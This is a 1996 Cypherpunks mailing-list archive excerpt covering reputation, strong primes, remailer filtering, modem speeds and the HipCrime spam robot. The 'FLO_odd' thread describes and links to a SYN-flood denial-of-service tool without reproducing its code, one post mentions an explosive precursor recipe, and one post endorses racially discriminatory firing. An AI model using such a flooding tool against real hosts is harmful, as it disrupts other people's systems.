09:00:52 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <323B1926.5656@ai.mit.edu> Message-ID: <3VL0TD46w165w@bwalk.dm.com> Hallam-Baker writes: > unjust if the company was bought out and the new owner decided to sack > all black people and people called "Perry". You were the one who brought > up the issue of fairness. The owner should be able to do that without interference from any gubment. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From gregburk at netcom.com Sat Sep 14 18:17:24 1996 From: gregburk at netcom.com (Greg Burk) Date: Sun, 15 Sep 1996 09:17:24 +0800 Subject: No Subject Message-ID: <653f3e543r@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Well, this looks like a chance to quickly correct some mistakes without spending a lot of time framing the issue. tcmay at got.net (Timothy C. May) writes: > But this latest episode illustrates the role of reputations. Namely, my own > reputation is not being harmed by bizarre commentaries from the Vulis-bot. ..among people who directly know you. You seem to see this as an example of reputations in action. But there isn't any "repute" in there at all. Surely this grand theoretical "reputation" framework isn't needed to describe simple direct experience. And it seems to me that your usage of "reputation" has at different times meant both direct and indirect exposure. This clearly discards important information, often to the detriment of your analysis. Perhaps you can explain why the two separate things are the same in some important way, aside from merely that they both involve esteem. > As its reputation is (apparently) pretty low, and associated with Serdar > Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity > can hardly "assassinate" my character. > A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx," > aka "Pablo Escobar," aka several other alternate personalities, wrote > dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc. > Did this have an effect on our reputations? Not to people I respected, of > course. And if Detweiler's rants affected my reputation with his peers, > including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic, > well, this is to the good. > In the mathematics of reputations, a negative reputation held by one whose > own reputation is negative is a positive. I don't think this is an example of any such thing. I would not respect a person even a tiny bit more just because a kook disrespects them. In fact, since the kooks frequently hold each other in very low esteem, the suggested polarity-math is self-contradictory. Rather, I think this is an example of how direct exposure supercedes reputation. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQBVAwUBMjs9GLMyVAabpHidAQE4PQH/dfVepFTivql8LtygN8BBoE/l03K7NOIH HVvH4QbHBY2MyVNviRN9R6MF2LsJRYp5SzFfdC+1vm/ohnhWEYZ4aA== =LdoS -----END PGP SIGNATURE----- t}t}t}t}t}t}t}t}. From gregburk at netcom.com Sat Sep 14 18:31:41 1996 From: gregburk at netcom.com (Greg Burk) Date: Sun, 15 Sep 1996 09:31:41 +0800 Subject: Reputation in action Message-ID: <7654f2dw3r@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Well, this looks like a chance to quickly correct some mistakes without spending a lot of time framing the issue. tcmay at got.net (Timothy C. May) writes: > But this latest episode illustrates the role of reputations. Namely, my own > reputation is not being harmed by bizarre commentaries from the Vulis-bot. ..among people who directly know you. You seem to see this as an example of reputations in action. But there isn't any "repute" in there at all. Surely this grand theoretical "reputation" framework isn't needed to describe simple direct experience. And it seems to me that your usage of "reputation" has at different times meant both direct and indirect exposure. This clearly discards important information, often to the detriment of your analysis. Perhaps you can explain why the two separate things are the same in some important way, aside from merely that they both involve esteem. > As its reputation is (apparently) pretty low, and associated with Serdar > Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity > can hardly "assassinate" my character. > A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx," > aka "Pablo Escobar," aka several other alternate personalities, wrote > dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc. > Did this have an effect on our reputations? Not to people I respected, of > course. And if Detweiler's rants affected my reputation with his peers, > including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic, > well, this is to the good. > In the mathematics of reputations, a negative reputation held by one whose > own reputation is negative is a positive. I don't think this is an example of any such thing. I would not respect a person even a tiny bit more just because a kook disrespects them. In fact, since the kooks frequently hold each other in very low esteem, the suggested polarity-math is self-contradictory. Rather, I think this is an example of how direct exposure supercedes reputation. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQBVAwUBMjs9GLMyVAabpHidAQE4PQH/dfVepFTivql8LtygN8BBoE/l03K7NOIH HVvH4QbHBY2MyVNviRN9R6MF2LsJRYp5SzFfdC+1vm/ohnhWEYZ4aA== =LdoS -----END PGP SIGNATURE----- From paul at fatmans.demon.co.uk Sat Sep 14 18:34:58 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Sun, 15 Sep 1996 09:34:58 +0800 Subject: forward secrecy in mixmaster Message-ID: <842701000.12934.0@fatmans.demon.co.uk> > This has been discussed extensively for Internet security reasons, and the > Photuris folks decided to use a common modulus (actually, several with different > lengths.) I think they chose a strong prime (form p = 2q+1, q prime), > specifically to avoid small-prime attacks, though they may have decided > that that was no longer necessary. I assume from the last sentence that you know that the use of strong primes is no longer advantageous but I will just reiterate it here for the good of those writing code which implements strong primes: Strong primes are no longer of any benefit for cryptographic applications. The elliptic curve method of factoring takes no longer to factor a "strong" prime than it does for any other general number. You may *SLIGHTLY* hinder progress if an attacker sieves first, but as you should have done so when you created the primes in the first place it won`t be a problem because there wont be any small factors. Implementing strong primes won`t make your code any less secure, it will just take longer to create the keys and won`t gain you any security, all te big boys are using elliptic curve factoring methods now so you really have nothing to gain. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From qut at netcom.com Sat Sep 14 19:04:03 1996 From: qut at netcom.com (Dave Harman OBC) Date: Sun, 15 Sep 1996 10:04:03 +0800 Subject: ? In-Reply-To: Message-ID: <199609150021.RAA18148@netcom2.netcom.com> In <517ia2$dmn at Networking.Stanford.EDU> llurch at stanford.edu (Skippy) writes: ! Too long. A few hours ago, the blocking ended, so Ingrid's wacky analysis ! of how this is all a ZOG plot is moot. Your consistent defence of censorship noted. The mere fact that censorship is evadable, never justifies the evil. Would you make the claim that there are no drug laws merely because it's easy to evade the laws against possession? From stevenw at best.com Sat Sep 14 19:04:30 1996 From: stevenw at best.com (Steven Weller) Date: Sun, 15 Sep 1996 10:04:30 +0800 Subject: SPL -- Suspicious Persons List Message-ID: >Perry E. Metzger wrote: >> >> Hallam-Baker writes: >> > Pity you guys missed out on the idea of trades unions and think that >> > employment is some kind of serfdom in which you loose all your >> > rights the day you sign up. If you hadn't sold your government to >> > the cooprorations a while back you might have got out of the middle >> > ages. >> >> Yes, we could be a workers paradise like one of those lovely European >> countries with double digit unemployment and all. Too bad we didn't go >> in for democratic socialism while we could have, eh? > >Perry, hate to burst your bubble but unemployment in the UK _trippled_ >in the first eighteen months of rule by that great socialist Margret ^^^^^^^^^ >Thatcher. One third of UK manufaturing industry went bankrupt in the >only large scale application of Freedman's ideas. Ummm. We're being Hallam-Baker PhD'ed again. I think she was a little bit Tory. Conservative, maybe? Right wing? Funded by industry? On kissing terms with Reagan? Socialist, no. Or was this an attempt by Doctor Sarcasm at wit? Actually the UK is now way ahead of the rest of Europe in terms of deregulation, low labor costs, efficient manufacturing, etc. Germany and France are now up the familiar creek because of their too-socialist policies. But there are those who say that Thatcher's slash and burn approach was appalling. You get the government you deserve, but not necessarily when you deserve it. That's what causes all the fuss. ------------------------------------------------------------------------- Steven Weller | Technology (n): | | A substitute for adulthood. stevenw at best.com | Popular with middle-aged men. From jya at pipeline.com Sat Sep 14 19:46:52 1996 From: jya at pipeline.com (John Young) Date: Sun, 15 Sep 1996 10:46:52 +0800 Subject: FLO_odd Message-ID: <199609150103.BAA03645@pipe2.t2.usa.pipeline.com> 2600, Summer, 1996 Flood Warning by Jason Fairlane This program scans a host to determine which ports are open, or listening for connections. Once a list of receiving ports has been compiled, the program then floods each of them with the specified number of SYN packets. Don't use this software without permission. I'm serious. It's very very very bad. This is probably one of the worst forms of Denial-Of-Service attacks there is. No one will be able to connect to your target's machine. It's bad. [Code follows.] ----- http://jya.com/floodd.txt (12 kb) FLO_odd Thanks to XX. From dfloyd at io.com Sat Sep 14 20:28:47 1996 From: dfloyd at io.com (Douglas R. Floyd) Date: Sun, 15 Sep 1996 11:28:47 +0800 Subject: Erasing Disks In-Reply-To: <199609142059.NAA13108@netcom8.netcom.com> Message-ID: <199609150111.UAA00636@pentagon.io.com> > > >But shredding the floppy? No need to classify that, no secrets leaked > > Burn after shredding, or you have a puzzle fan reassembling the shredded disk. Actually, taking the cookie portion out, putting it on an inverted cup so its in the center of the microwave, then letting it cook for 30 seconds does the job quite well =) From azur at netcom.com Sat Sep 14 20:48:37 1996 From: azur at netcom.com (Steve Schear) Date: Sun, 15 Sep 1996 11:48:37 +0800 Subject: Alien and Sedition Acts [WAS xs4all.nl] then Terrorists Message-ID: Look for something along these lines from Congress in the not too distant future. All in our best interest, of course. (from 'In Pursuit of Reason: The Life of Thomas Jefferson, Nobel E. Cunningham, Jr.) "The first alien act (June 25, 1798) empowered the president to order the deportation of any alien he judged "dangerous to the peace and saftey of the united State" or had reasonable grounds to suspect was involved in any trasonable intrigue against the government. It was up to the president to determine what constituted a danger." "Even more sweeping and more objectionable to Republican opponents of the administration was the sedition act (July 14, 1798). Passed in the final days of of the session, after Jefferson had left for Virginia, the act made it unlawful for any person to combine or conspire together to oppose any lawful measure of the government, to prevent any officer of the united States from performing his duties, or to aid or attempt to procure 'any insurrection, roit, unlawful assembly, or combination.' Furthermore, it provided for the punishment of any person writing, uttering, or publishing 'any false, scandalous and malicious writing' against the president, the Congress of the government of the united States, made with the intent to defame them or exite against them 'the hatred of the good people of the united States.'" >At Mon, 9 Sep 1996 17:54:29 -0700, Timothy C. May wrote: > >> Then again, the only reason I am not a terrorist is that the government >>hasn't YET defined hate speach directed against the government to be >>terrorism. > >Don't be so hasty in saying this. > >A couple of months ago Clinton signed some sort of bill having to do with >terrorism, terrorist organizations, funding of same, and deportation of >alien-units suspected of being allied with terrorist organizations. (I seem >to recall another such act being passed in early 1995, so there may be more >than one of these things...) > >Given the mounting hysteria about terrorism (by the government, at least), >and given the various laws on the books, I would not be surprised to see >some Web sites prosecuted as "harboring" terrorists terrorist-symps. > >If any of you are not citizens of the U.S., and are here on visas, I would >give this some real serious thought. Of course, maybe deportation is a >blessing in disguise. > >--Tim May From perry at piermont.com Sat Sep 14 21:03:45 1996 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 15 Sep 1996 12:03:45 +0800 Subject: FLO_odd In-Reply-To: <199609150103.BAA03645@pipe2.t2.usa.pipeline.com> Message-ID: <199609150203.WAA06409@jekyll.piermont.com> The software in question should come with a warning attached: use it and go to jail. Its a felony to maliciously disrupt someone's machines. Perry John Young writes: > 2600, Summer, 1996 > > Flood Warning > > by Jason Fairlane > > > This program scans a host to determine which ports are open, > or listening for connections. Once a list of receiving ports > has been compiled, the program then floods each of them with > the specified number of SYN packets. > > Don't use this software without permission. I'm serious. It's > very very very bad. This is probably one of the worst forms > of Denial-Of-Service attacks there is. No one will be able > to connect to your target's machine. It's bad. > > [Code follows.] > > ----- > > http://jya.com/floodd.txt (12 kb) > > FLO_odd > > > Thanks to XX. > > > > From jya at pipeline.com Sat Sep 14 22:06:34 1996 From: jya at pipeline.com (John Young) Date: Sun, 15 Sep 1996 13:06:34 +0800 Subject: FLO_odd Message-ID: <199609150315.DAA13440@pipe2.t2.usa.pipeline.com> On Sep 14, 1996 22:03:28, '"Perry E. Metzger" ' wrote: >The software in question should come with a warning attached: use it and go to >jail. Its a felony to maliciously disrupt someone's machines. ---------- Heed Perry: here's the author's warning at the commencement of code: /* !!THIS PROGRAM IS EXTREMELY DANGEROUS!! NO GUIDELINES * ARE PROVIDED FOR THE CODE CONTAINED HEREIN. IT IS MERELY * A DEMONSTRATION OF THE POSSIBLE DESTRUCTIVE USE OF IP * SPOOFING TECHNIQUES. THE AUTHOR CLAIMS NO RESPONSIBILITY * FOR ITS USE OR MISUSE. - JF (3/8/96) */ From jamesd at echeque.com Sat Sep 14 22:21:05 1996 From: jamesd at echeque.com (James A. Donald) Date: Sun, 15 Sep 1996 13:21:05 +0800 Subject: Why organizations turn statist. Message-ID: <199609150312.UAA02749@dns2.noc.best.net> At 09:44 AM 9/11/96 -0700, Timothy C. May wrote: > A wonderful idea, Stephan! You might try contacting > EFF to see if a German branch exists The EFF is ultimately a business lobby group, because it gets most of its funding from businesses. It is therefore potentially subject to the same corruption as other business lobbies. Business lobby groups are intermediaries, and therefore serve two masters, both the politicians and the businessmen, not one master. Frequently they serve the interests of the politicians at the expense of their donors, at the expense of the goals that the lobby group is supposed to pursue. Suppose for example you have a lobby group that represents the widget industry. On the one hand, the CEO of General Widgets might ring them up and say: "We are being trashed by these great japanese widgets, and unless something is done about it we might have to reduce prices or improve quality", and the lobby organization has a little chat with some tame politicians about the terrible suffering the Japanese are inflicting on American workers. That is the way lobby groups are supposed to work, but seldom do. On the other hand sometimes the politician (or a gofer on his staff), rings the lobby and says: "I need a million dollars fast: What potential political action gets the chairman of General Widgets waking up in a cold sweat in the middle of the night? What could destroy the widget industry, and yet be politically feasible?" Shortly thereafter the lobbyist has a little chat with chairman of General Widgets about forthcoming legislation. The lobby group gets a big bag of money, some of which it passes on to the politician, and the threatened legislation evaporates until the next election. To be a successful lobby group, the EFF needs to get its fingerprints on legislation, so that it can make threats and promises to businessmen in the computer industry. Thus the EFF's best interests as an organization are contrary to our desires and contrary to the announced aims of the organization. Legislation, any legislation, is in their interests and legislation, any legislation is against our interests. Our interests, and the EFF's interest are opposed with no apparent mutual good possible. Now it is possible that the EFF is virtuously pursuing its supposed goals, rather than its practical interests. We should consider the available evidence in order to infer what it is in fact up to. According to Dave Barry the word "politics" derives from the Greek "poly" meaning many, and "ticks" meaning small disgusting bloodsucking parasites. In order to be well funded, the EFF needs government regulation of the net. The kind of regulation that would be most effective in ensuring large donations would be regulation that compels internet businessmen to lobby the government. for example regulations that make impossible, inconsistent, and contradictory requirements on those who provide software, hardware, and services, for example a demand that big companies police the net in ways that even governments would find extremely difficult, such as the British child porn crackdown, or legislation which if properly crafted would have the effect of giving some businessmen a monopoly of some aspect of the net, and putting other businessmen out of business, for example legislation that requires case by case approval of software, or legislation that compels the businessman to invade his customers privacy, and also prohibits him from invading that privacy unless he has a waiver issued by the state. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Sat Sep 14 22:22:07 1996 From: jamesd at echeque.com (James A. Donald) Date: Sun, 15 Sep 1996 13:22:07 +0800 Subject: Jury Nullification = Voting One's Conscience Message-ID: <199609150324.UAA03466@dns2.noc.best.net> At 07:24 PM 9/11/96 -0700, Timothy C. May wrote: > And I don't think there has _ever_ been a case of a juror prosecuted/jailed > for voting his or her conscience, regardless of jury instructions. Where have you been for the last twenty years? In fact a juror was recently jailed for this. She had informed the other juries of the likely severity of the punishment for pot, and refused to vote for conviction. She was charged with perjury and various contrived and bogus charges. The basis of perjury charge was that she had sworn there was no reason she could not do justice, and, according to the court, she was not doing justice because of her opposition to the drug laws.. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From EALLENSMITH at ocelot.Rutgers.EDU Sat Sep 14 22:37:33 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sun, 15 Sep 1996 13:37:33 +0800 Subject: Uses of Computational Chaos Message-ID: <01I9HJIYSVKK9ULPY6@mbcl.rutgers.edu> It is reasonably obvious that using _computational_ (as opposed to physical) chaos won't increase entropy. But how about using it to make an attacker work harder to use any flaws in your method of generating random bits? As a simplistic example, say that the scribble window you're using tends to result in a 1 for each 3rd bit. Nice and simple for an attacker to exploit. But if that output is then fed into a chaotic system as its starting conditions, and you then take the state of that system after a sufficient number of iterations and use it as the basis for the IDEA key or whatever, the attacker doesn't just have to search through all the IDEA keys with the third bits being 1's - they have to process each of those through the chaotic system and use those results. Sort of like factoring - checking any two given prime factors will be rather easy, it's just the sheer number you have to check that makes things difficult. (This can be thought of as an odd variety of hash, particularly if you do something like chopping off the most-significant-bit in the chaotic system's output.) -Allen From EALLENSMITH at ocelot.Rutgers.EDU Sat Sep 14 23:00:54 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sun, 15 Sep 1996 14:00:54 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: <01I9HK94QG309ULPY6@mbcl.rutgers.edu> From: IN%"jf_avon at citenet.net" "Jean-Francois Avon" 14-SEP-1996 03:33:52.00 To: IN%"cypherpunks at toad.com" CC: Subj: RE: "Remailers can't afford to be choosy" >If, just for the sake of example, you were truly believing in >unregulated capitalism, with all the arguments in the world, and , >say for the sake of the example, again, a True Communist (tm) was >mailing through your remailer, advocating that they seize your >property for the benefit of some unknown, but all deserving stranger. >Would any censorship be illegitimate? In other words, should you >work to further the work of the ones who whishes, but their avowed >goals, to bring you harm? Actually, I already may have helped a radical left organization - namely Radikal - by putting some mirror sites on a lot of search engines. Quite simply, capitalism works - and it will win out in an unfettered contest. It's communism and other varieties of authoritarianism that need the fetters to win. (In the ultimate extreme, I include gun control under the fetters that communism/etcetera need to win... the "redistribution" from producers ("rich") to welfare drones ("poor") during the Rodney King riots would have been nicely prevented by some shopkeepers with automatic weapons. -Allen From EALLENSMITH at ocelot.Rutgers.EDU Sat Sep 14 23:06:39 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sun, 15 Sep 1996 14:06:39 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: <01I9HKVBXEBM9ULPY6@mbcl.rutgers.edu> From: IN%"tcmay at got.net" 13-SEP-1996 20:33:15.39 >I'm fully aware of the rights of remailers to limit what they pass on. I >just don't think it wise, nor do I think it fits with pious calls for "free >speech." I've been looking over your original posting... such as at your comment about situations working out the best when only the parties involved are involved in rulemaking. I'd agree... and remailer operators are among the parties involved in these cases. This may be via direct individual pressure (for remailers without front ends) or through conscience/social pressure (for remailers with disposable front ends or chaining-only remailers), but they're still involved. To me, there are two different types of filtering that can be done. There's the filtering of data into their appropriate categories - e.g., a moderator of a mailing list deciding that something is off-topic _for that list_, not for any discussion - and filtering of data into stuff that should be transmitted and shouldn't be transmitted, even though, e.g., it's on topic for a given mailing list. I discourage people from doing the second type of filtering - it's something that government shouldn't do at all, and that makes in my view the person doing such filtering responsible for _everything_ that they do let through (preferably legally responsible). The first type is tricky enough to tell from the second that I don't want government doing it, but I don't discourage others from doing so. There's also the matter that it will take some improvements to get to a situation where remailer operators won't have to deal with so much - e.g., expiration of some patents so that remailers can take digital cash. It's just that I don't see pressure such as from spamming through remailers as helping to get those improvements, all in all. Some of it may - e.g., encouragement of dropping of inadequately secure remailers like anon.penet.fi (sorry, Julf), as you mentioned - but this isn't the case for all of it. -Allen From mycroft at actrix.gen.nz Sun Sep 15 01:34:07 1996 From: mycroft at actrix.gen.nz (Paul Foley) Date: Sun, 15 Sep 1996 16:34:07 +0800 Subject: Exactly the point Lance... [Fwd: HipCrime and Art] In-Reply-To: <199609141912.NAA13899@rintintin.Colorado.EDU> Message-ID: <199609150555.RAA03096@mycroft.actrix.gen.nz> On Sat, 14 Sep 1996 13:08:22 -0600, Admin wrote: Exactly the point, bingo! The point is this, exactly what do YOU define as *fucking shit* so that anyone who visits your page will know exactly what they can and can't say to Lance Cottrell. We've determined that you don't want to receive the HipCrime URL from your mailto: button. What about the next visitor who comes across your page, how will they know exactly what you do or do not find interesting? Will you put a lengthy *what I expect from all correspondents who use my mailto: button* explanation on the page? Perhaps a simple, *don't mail me unless I already know you and want to hear what you have to say...* tag? I think it's fairly obvious that any mailto tag on Lance's *Mixmaster page* is for comments and suggestions concerning Mixmaster, or the page itself. URLs about fractal art, who killed JFK, and your favourite episode of The X Files could then be expected to be considered *fucking shit*. As you seem to feel that being accessible by email is licence for anyone to send you anything they want unless they have specific knowledge that you don't want to receive it, and given that I have no knowledge about what you don't want to receive, I'm going to set up a spider to trawl the web and mail you every single URL it encounters, in the certain knowledge that you consider this legitimate use of your address :-) -- Paul Foley --- PGPmail preferred PGP key ID 0x1CA3386D available from keyservers fingerprint = 4A 76 83 D8 99 BC ED 33 C5 02 81 C9 BF 7A 91 E8 ---------------------------------------------------------------------- I'm having an emotional outburst!! From stewarts at ix.netcom.com Sun Sep 15 09:07:34 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 16 Sep 1996 00:07:34 +0800 Subject: 56 kbps modems Message-ID: <199609150831.BAA20470@dfw-ix6.ix.netcom.com> >> >U.S. Robotics and Rockwell International are planning new modems with >> >speeds up to 56 kbps a second, almost double the speed of the fastest >> >rate now available. The new devices should be available by the end of >> >the year, although their top speed initially may be less than 56 kbps. >> >(Wall Street Journal 12 Sep 96 B11) >> People who seemed to know used to say that 'the Shannon limit' >> set an absolute upper limit around 40 kbps. Has Shannon been >> proven wrong, or what? >Well, it all depends on the signal-to-noise ratio. Also, if the noise is >not white gaussian the situation can be even better. Or it can be worse. Almost all voice traffic in the US these days, either once it gets to your local telephone wire center or maybe before, is carried on T1 digital connections, which use 64kbps digital voice - it's sampled at 8000 samples/second, A/D converted using a non-linear 8-bit scale called mu-law (or A-law for Europe), and (for the most common framing format) has a signalling channel stego'd onto the LSB of every 6th byte. If you knew which the "robbed bit" was, you could get 63 kbps of digital data, but since you don't, digital signals are limited to 56kbps since they can't trust any of the low bits (analog doesn't lose much from this.) Unless they're _really_ talking about ISDN "modems", I'm surprised to hear somebody saying they can take 56 kbps, turn it into analog, let the phone company quantize and mu-law the analog into 64kbps, and still get the original 56kbps back out. But if they can, well, yee-hah, ISDN is nearly dead :-) (Not totally dead; the signalling is still useful for some applications, the convenience of two channels on one wire pair is nice, and the fact that people can get 56kbps without the phone company's help will pressure them into offering ISDN for a lower price in areas where the Phone Company's idea of "all the market will bear" is substantially higher than voice pricing.) (For Norm Hardy's comment on PBXs, the main transparent approach to that is to use ISDN as the interface. PBXs often use ISDN to reach either local or long-distance phone companies, since they generally want more than vanilla signalling anyway.) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Sun Sep 15 09:08:15 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 16 Sep 1996 00:08:15 +0800 Subject: HipCrime as MetaSPAM Message-ID: <199609150910.CAA20840@dfw-ix6.ix.netcom.com> The Hippie Of Crime suggests that anybody who puts a mailto: with their name on it is inviting mail, so what he did shouldn't be construed as rude. He also asked that remailer operators not block HipCrime SPAM deliveries and all mail to HipCrime because people might be interested in his cool fractals and Java neural net lotto-predicters and anarchist pages. I disagree, on various points. 1) There's a Robot Exclusion Standard, which uses a robots.txt file as a convention for websites to inform webcrawling programs of sections of their directories they don't want crawled through. The HipCrime Email Robot appears to ignore this convention - I don't have a Java Decompiler on my Wimpy Win3.1 system, but the strings program doesn't show the string robots.txt anywhere in the bytecodes, which I assume means it ain't there. 2) If a mailto: on a web page is an offer to human readers to send mail to a human or bot that handles mail relevant to some topic on the page, that doesn't mean the author invited mail except as described in the human-readable-language on the page, which may say which addresses are invitations to send mail on what topic. Furthermore, the author may not be the recipient of the mail anyway; The Hippie Of Crime Lives Here 3) An invitation to a reader to send mail from the reader isn't an invitation to send a large number of identical mail messages. A spam-generator like the Hippie Of Crime posted isn't designed to add comments from the reader of the MetaSpamEmailRobot page, it's designed to get many other people to send HippieSPAMs from the Hippie Of Crime. 4) This isn't the first time he's done this sort of thing. I took a look at the www.hipcrime.com pages, and aside from the Annoying Frames and Highly Annoying Evil META REFRESH auto-flipping pages, and Annoying Animated GIFs, there were some really cool-looking fractals, and a saga about how a few years ago he was faxing fractals out to a few hundred people who he'd put on a fax-mailing list, many without asking them. ====================================================================== Free FAX Fractals Free-FAX-Fractals was a long running FAX prank/art project, using facsimile machines to invade office spaces with monochrome mathematical psychedelia. During 1992 and 1993, a list of over 500 fax numbers was compiled while roaming around San Francisco. These numbers were taken mostly from signs and business cards, but many people volunteered their numbers hoping to receive trippy fractal faxes on a weekly basis. ===========rest-of-saga omitted================================ Only a couple people actually complained, and the police _asked_ to get added to the list. 5) "Anarchist Info" - sigh. Where do people get the idea that publishing recipes for drugs and explosives is anarchist info? He didn't talk about anarchy, or getting along without governments, or getting rid of them. Also, he neglects to note that you can simply _buy_ potassium chlorate, rather than having to (dangerously) boil down bleach and potassium chloride to make the stuff. Don't try this crap at home, kids, and please don't blame the anarchists for it. Just a Hippie Of Crime, not a Hippie Of Clue. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From paul at fatmans.demon.co.uk Sun Sep 15 09:11:01 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 16 Sep 1996 00:11:01 +0800 Subject: Cypherpunks Message-ID: <842781740.23306.0@fatmans.demon.co.uk> > CypherPunks live so far from real-life, that it's impossible for them > to communicate rationally. Never having any danger in their lives, > they want to avoid encountering any in "cyberspace". They are trying > to craft that new world according to their intellectual guidelines. > Trying to make sure real-world annoyances have been removed. No, I can`t let that pass, the say that cypherpunks try to avoid danger in real life and online is absolute rubbish. The libertarian polotics embodied by the cypherpunk movement encourages a way of life which is indeed more dangerous than other type of society, annoyances are different, sure they try to avoid annoyances, but this does not stretch as far as encouraging censorship, its just that, from my point of view anyway, most cypherpunks idea of a utopian society does not include big commerce, which is associated with big government, indeed most of us find the one minded lust for money of the junk mailers to be distasteful in itself. to say we attempt to create a "safe" society online and off is correct but only in a superficial sense, I believe the cypherpunks want a safe society as much as anyone else but believe that the best way to achieve it is through individual liberty, not through totalitarian statist government, furthermore cypherpunks and libertarians as a whole accept that a dangerous society is an inevitable consequence of a free society, but that this is a price worth paying. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From pgut001 at cs.auckland.ac.nz Sun Sep 15 09:13:59 1996 From: pgut001 at cs.auckland.ac.nz 